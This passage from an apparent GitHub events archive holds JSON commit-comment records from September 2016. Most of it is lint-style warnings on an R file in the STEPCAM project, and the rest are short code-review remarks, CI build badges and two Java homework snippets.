 ~^~~\n```\n[R/generateArtificialData.R:42:48:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L42) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits <- rnorm(n_traits, mean = 0, sd = 1)\n                                              ~^~\n```\n[R/generateArtificialData.R:43:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L43) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n^~\n```\n[R/generateArtificialData.R:44:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L44) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n^~\n```\n[R/generateArtificialData.R:44:16:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L44) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(j in 1:n_traits){\n               ^\n```\n[R/generateArtificialData.R:45:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L45) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      }\n^\n```\n[R/generateArtificialData.R:45:18:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L45) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t      for(k in 1:pool_richness){\n                 ^\n```\n[R/generateArtificialData.R:46:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L46) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:46:25:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                       ~^~~\n```\n[R/generateArtificialData.R:46:28:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L46) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                           ^\n```\n[R/generateArtificialData.R:46:31:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                             ~^~\n```\n[R/generateArtificialData.R:46:36:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L46) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      l <- (j - 1) * pool_richness + k\n                                  ~^\n```\n[R/generateArtificialData.R:47:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L47) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n^\n```\n[R/generateArtificialData.R:47:44:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L47) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t      opt_traits_matrix[l] <- opt_traits[j]\n                                          ~^~~\n```\n[R/generateArtificialData.R:48:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L48) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n^\n```\n[R/generateArtificialData.R:49:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L49) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    trait_distances_onedimen <- c()\n^\n```\n[R/generateArtificialData.R:50:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L50) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    for(m in 1:pool_richness){\n^\n```\n[R/generateArtificialData.R:50:31:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                             ~^~~\n```\n[R/generateArtificialData.R:50:65:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L50) *style:* **Put spaces around all infix operators.**\n```r\n​\t    opt_traits_matrix <- matrix(opt_traits_matrix, ncol = n_traits)\n                                                               ~^~\n```\n[R/generateArtificialData.R:51:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L51) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^\n```\n[R/generateArtificialData.R:51:30:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                            ~^~~\n```\n[R/generateArtificialData.R:51:49:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L51) *style:* **Put spaces around all infix operators.**\n```r\n​\t    traits_distances <- abs(traits_pool - opt_traits_matrix)\n                                               ~^~\n```\n[R/generateArtificialData.R:52:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L52) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    }\n^\n```\n[R/generateArtificialData.R:53:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L53) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^\n```\n[R/generateArtificialData.R:53:16:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L53) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    for(m in 1:pool_richness){\n               ^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L54) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n^\n```\n[R/generateArtificialData.R:54:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L54) *style:* **lines should not be more than 80 characters.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:54:43:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                         ~^~~\n```\n[R/generateArtificialData.R:54:77:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L54) *style:* **Put spaces around all infix operators.**\n```r\n​\t      trait_distances_onedimen[m] <- sqrt(sum(traits_distances[m, ] * traits_distances[m, ]))\n                                                                           ~^~\n```\n[R/generateArtificialData.R:56:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L56) *style:* **lines should not be more than 80 characters.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:56:27:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                         ~^~~\n```\n[R/generateArtificialData.R:56:31:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L56) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                              ^\n```\n[R/generateArtificialData.R:56:57:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                       ~^~\n```\n[R/generateArtificialData.R:56:90:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L56) *style:* **Put spaces around all infix operators.**\n```r\n​\t    inv_distances <- -(trait_distances_onedimen - max(trait_distances_onedimen)) + 10^-99\n                                                                                        ~^~\n```\n[R/generateArtificialData.R:57:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L57) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t  comm_spec_matrix[i, c(present_species)] <- 1\n^\n```\n[R/generateArtificialData.R:57:29:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L57) *style:* **Put spaces around all infix operators.**\n```r\n​\t    present_species <- sample(c(1:pool_richness), richness_values[i],\n                           ~^~~\n```\n[R/generateArtificialData.R:58:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L58) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:59:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L59) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix\n^\n```\n[R/generateArtificialData.R:60:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L60) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n^\n```\n[R/generateArtificialData.R:62:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L62) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n^\n```\n[R/generateArtificialData.R:63:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L63) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n^\n```\n[R/generateArtificialData.R:63:11:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L63) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n          ^\n```\n[R/generateArtificialData.R:63:58:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L63) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) traits_pool_df <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:65:14:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n            ~^~~\n```\n[R/generateArtificialData.R:65:62:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L65) *style:* **Put spaces around all infix operators.**\n```r\n​\trow1 <- c(column1[-c(which(colSums(comm_spec_matrix) == 0))])\n                                                            ~^~~\n```\n[R/generateArtificialData.R:66:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L66) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^\n```\n[R/generateArtificialData.R:66:11:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L66) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n          ^\n```\n[R/generateArtificialData.R:66:58:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L66) *style:* **Put spaces around all infix operators.**\n```r\n​\tif(length(which(colSums(comm_spec_matrix) == 0)) != 0) comm_spec_matrix <-\n                                                        ~^~~\n```\n[R/generateArtificialData.R:67:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L67) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L69) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^\n```\n[R/generateArtificialData.R:69:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L69) *style:* **lines should not be more than 80 characters.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:69:26:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L69) *style:* **Put spaces around all infix operators.**\n```r\n​\tcomm_spec_matrix <- as.data.frame(cbind(comm_spec_matrix, rep(\"\", n_communities)))\n                        ~^~~\n```\n[R/generateArtificialData.R:70:33:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L70) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(comm_spec_matrix) <- row1\n                               ~^~~\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L72) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n^\n```\n[R/generateArtificialData.R:72:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L72) *style:* **lines should not be more than 80 characters.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/generateArtificialData.R:72:15:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L72) *style:* **Put spaces around all infix operators.**\n```r\n​\tplots <- as.data.frame(matrix(as.numeric(as.matrix(comm_spec_matrix[, -ncol(comm_spec_matrix)])),\n             ~^~~\n```\n[R/generateArtificialData.R:74:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L74) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n^\n```\n[R/generateArtificialData.R:75:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L75) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t                traits_pool_df[ ,c(2:ncol(traits_pool_df))])\n^\n```\n[R/generateArtificialData.R:75:22:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L75) *style:* **Put spaces around all infix operators.**\n```r\n​\tnames(plots) <- traits_pool_df[, 1]\n                    ~^~~\n```\n[R/generateArtificialData.R:77:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L77) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n^\n```\n[R/generateArtificialData.R:77:53:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L77) *style:* **Put spaces around all infix operators.**\n```r\n​\ttraits_pool_df[ ,c(2:ncol(traits_pool_df))] <- as.matrix(\n                                                   ~^~~\n```\n[R/generateArtificialData.R:79:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L79) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/generateArtificialData.R:80:1:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L80) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\toutput <- list( traits = traits_pool_df, abundances = plots);\n^\n```\n[R/generateArtificialData.R:80:13:](https://github.com/thijsjanzen/STEPCAM/blob/e4b38f5b0fc1d87b26a433b25e15bf7d329e788d/R/generateArtificialData.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\tfor (i in 2:ncol(traits_pool_df)) {\n            ^\n```\n"}},"created_at":"2016-09-20T06:54:40Z"}
{"id":"4587810751","type":"CommitCommentEvent","actor":{"login":"dmitryshurshilin"},"repo":{"name":"OsipovDenis/frontend-video-angular"},"payload":{"comment":{"id":19091456,"position":15,"line":15,"path":"client/table/dataService.js","commit_id":"73fdb4bf3ce5b5c729467281ec013a878e79300a","created_at":"2016-09-20T06:54:55Z","updated_at":"2016-09-20T06:54:55Z","body":"`return angular.merge(data[key], {id: key});`"}},"created_at":"2016-09-20T06:54:55Z"}
{"id":"4587811857","type":"CommitCommentEvent","actor":{"login":"krishnenthuchakra1977"},"repo":{"name":"krishnenthuchakra1977/imad-2016-app"},"payload":{"comment":{"id":19091457,"position":null,"line":null,"path":null,"commit_id":"21b5ac3a55301aa387e2f841bb1fedef4f3a2542","created_at":"2016-09-20T06:55:14Z","updated_at":"2016-09-20T06:55:14Z","body":"![images](https://cloud.githubusercontent.com/assets/22211416/18660288/44c35752-7f2d-11e6-8917-1717250c0b1e.jpg)\r\n"}},"created_at":"2016-09-20T06:55:14Z"}
{"id":"4587812779","type":"CommitCommentEvent","actor":{"login":"ViliusKraujutis"},"repo":{"name":"vilnius/problemos"},"payload":{"comment":{"id":19091458,"position":null,"line":null,"path":null,"commit_id":"1bb5a200fa9593f1e51262c5cfbbc6d1bb088fdb","created_at":"2016-09-20T06:55:28Z","updated_at":"2016-09-20T06:55:28Z","body":"Also, maybe worth mentioning, that this public key is added to Android repository here: https://github.com/vilnius/tvarkau-vilniu/pull/74"}},"created_at":"2016-09-20T06:55:28Z"}
{"id":"4587813549","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19091459,"position":null,"line":null,"path":null,"commit_id":"8f031955eb692d33084225fc5e864ca0b2c70354","created_at":"2016-09-20T06:55:42Z","updated_at":"2016-09-20T06:55:42Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1767 of 1767 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-8f031955eb692d33084225fc5e864ca0b2c70354-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-20T06:55:42Z"}
{"id":"4587815209","type":"CommitCommentEvent","actor":{"login":"krishnenthuchakra1977"},"repo":{"name":"krishnenthuchakra1977/imad-2016-app"},"payload":{"comment":{"id":19091467,"position":null,"line":null,"path":null,"commit_id":"21b5ac3a55301aa387e2f841bb1fedef4f3a2542","created_at":"2016-09-20T06:56:10Z","updated_at":"2016-09-20T06:56:10Z","body":"![images](https://cloud.githubusercontent.com/assets/22211416/18660300/5095e3d8-7f2d-11e6-97ad-be4cf7f34052.jpg)\r\n"}},"created_at":"2016-09-20T06:56:10Z"}
{"id":"4587815582","type":"CommitCommentEvent","actor":{"login":"naveenvalluru"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19091468,"position":null,"line":null,"path":null,"commit_id":"7bbaf367351737cbf498b8d630643a2408c564ec","created_at":"2016-09-20T06:56:17Z","updated_at":"2016-09-20T06:56:17Z","body":"import java.io.*;\r\nimport java.util.*;\r\n\r\nclass Sol\r\n{\r\npublic static void main(String args[])\r\n{\r\nint a,b,c,d,e,f=0,g=0,h=0;\r\nScanner sc=new Scanner(System.in);\r\nSystem.out.println(\"enter three numbers\");\r\na=sc.nextInt();\r\nb=sc.nextInt();\r\nc=sc.nextInt();\r\n\r\nif(a<=b && b<=c)\r\n{\r\nf=a;\r\ng=b;\r\nh=c;\r\n}\r\nelse if(a<=c && c<=b)\r\n{\r\nf=a;\r\ng=c;\r\nh=b;\r\n}\r\nelse if(b<=a && a<=c)\r\n{\r\nf=b;\r\ng=a;\r\nh=c;\r\n}\r\nelse if(b<=c && c<=a)\r\n{\r\nf=b;\r\ng=c;\r\nh=a;\r\n}\r\nelse if(c<=a && a<=b)\r\n{\r\nf=c;\r\ng=a;\r\nh=b;\r\n}\r\nelse if(c<=b && b<=a)\r\n{\r\nf=c;\r\ng=b;\r\nh=a;\r\n}\r\nelse if(c<=b && b<=a)\r\n{\r\nf=c;\r\ng=b;\r\nh=a;\r\n}\r\n\r\n\r\nif(g-f==h-g)\r\n{\r\nSystem.out.println(\"true\");\r\n}\r\nelse\r\n{\r\nSystem.out.println(\"false\");\r\n}\r\n}\r\n}"}},"created_at":"2016-09-20T06:56:17Z"}
{"id":"4587815906","type":"CommitCommentEvent","actor":{"login":"xhoaluu"},"repo":{"name":"RestComm/sip-servlets"},"payload":{"comment":{"id":19091469,"position":50,"line":552,"path":"sip-servlets-impl/src/main/java/org/mobicents/servlet/sip/message/B2buaHelperImpl.java","commit_id":"25e2d60e98e75cbdf8f1cca9f32c6855618d68d9","created_at":"2016-09-20T06:56:23Z","updated_at":"2016-09-20T06:56:23Z","body":"minor:\r\nServletContext servCtx: could we get it direct from \"SipApplicationSessionCreationThreadLocal.lookupContext().getServletContext();\", then we dont need to change API method inputs."}},"created_at":"2016-09-20T06:56:23Z"}
{"id":"4587817352","type":"CommitCommentEvent","actor":{"login":"naveenvalluru"},"repo":{"name":"Akash-Sinha/AndroidTraining-2016-17"},"payload":{"comment":{"id":19091471,"position":null,"line":null,"path":null,"commit_id":"7bbaf367351737cbf498b8d630643a2408c564ec","created_at":"2016-09-20T06:56:48Z","updated_at":"2016-09-20T06:56:48Z","body":"import java.lang.*;\r\nimport java.util.*;\r\nimport java.io.*;\r\n\r\nclass Sub\r\n{\r\npublic static void main(String args[])\r\n{\r\nString s1,s2,s3;\r\nScanner sc=new Scanner(System.in);\r\nSystem.out.println(\"enter string and checking string\");\r\ns1=sc.nextLine();\r\ns2=sc.nextLine();\r\nif(s1.contains(s2))\r\n{\r\ns3=s1.replace(s2,\"\");\r\nSystem.out.println(s3);\r\n}\r\nelse\r\n{\r\nSystem.out.println(s1);\r\n}\r\n}\r\n}"}},"created_at":"2016-09-20T06:56:48Z"}
{"id":"4587819193","type":"CommitCommentEvent","actor":{"login":"chakrigithub"},"repo":{"name":"chakrigithub/HyderabadCDTraining"},"payload":{"comment":{"id":19091477,"position":null,"line":null,"path":null,"commit_id":"c55dc5f7afb3ba33a56210323f527807c88c9529","created_at":"2016-09-20T06:57:18Z","updated_at":"2016-09-20T06:57:18Z","body":"this commit is from chakri"}},"created_at":"2016-09-20T06:57:18Z"}
{"id":"4587824327","type":"CommitCommentEvent","actor":{"login":"Huevos"},"repo":{"name":"OpenViX/enigma2"},"payload":{"comment":{"id":19091486,"position":null,"line":null,"path":null,"commit_id":"988379ee1df1e88c6e74236cd79749abbb7489f9","created_at":"2016-09-20T06:58:45Z","updated_at":"2016-09-20T06:58:45Z","body":"With this commit -e setting can't be used anymore.\r\n"}},"created_at":"2016-09-20T06:58:45Z"}
{"id":"4587825094","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19091488,"position":null,"line":null,"path":null,"commit_id":"056b267146b2368e483ebbe2caadd52fff6c1aa5","created_at":"2016-09-20T06:58:59Z","updated_at":"2016-09-20T06:58:59Z","body":"develop (macumber) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-056b267146b2368e483ebbe2caadd52fff6c1aa5-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-20T06:58:59Z"}
{"id":"4587825115","type":"CommitCommentEvent","actor":{"login":"orcchg"},"repo":{"name":"YevhenHordiichuk-itstep/ITStep_Lesson_4"},"payload":{"comment":{"id":19091489,"position":6,"line":6,"path":"homework_4_10.cpp","commit_id":"8c9765aedd6c5dde9ba939fa1774f0391215f2c7","created_at":"2016-09-20T06:58:59Z","updated_at":"2016-09-20T06:58:59Z","body":"у вас нулевой указатель, не указывающий ни как какую заранее выделенную ячейку памяти. Любое обращение к элементу массива через такой указатель приведет к крешу"}},"created_at":"2016-09-20T06:58:59Z"}
{"id":"4587827738","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19091499,"position":null,"line":null,"path":null,"commit_id":"7c6c476e9666f2a67b4b0c88af2f5a8dace437d0","created_at":"2016-09-20T06:59:43Z","updated_at":"2016-09-20T06:59:43Z","body":"Because a pawn advance is a discovered check only is the case of diagonal x-ray to the king. For the other types of pieces, a move by a discovered check candidate is always a check."}},"created_at":"2016-09-20T06:59:43Z"}
